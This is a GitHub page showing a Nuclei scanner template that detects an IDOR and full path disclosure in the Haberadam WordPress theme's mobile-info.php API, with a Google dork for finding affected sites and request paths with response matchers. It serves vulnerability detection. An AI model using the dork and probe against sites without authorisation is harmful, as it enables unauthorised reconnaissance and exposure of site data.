-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwp-haberadam-idor.yaml
More file actions
37 lines (32 loc) · 857 Bytes
/
wp-haberadam-idor.yaml
File metadata and controls
37 lines (32 loc) · 857 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
id: wp-haberadam-idor
info:
name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API
author: pussycat0x
severity: low
reference: https://cxsecurity.com/issue/WLB-2021090078
metadata:
google-dork: inurl:/wp-content/themes/haberadam/
tags: wordpress,idor,wp-theme
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id='
- '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id='
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"status"'
- '"hava"'
- '"degree"'
- '"icon"'
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- text/html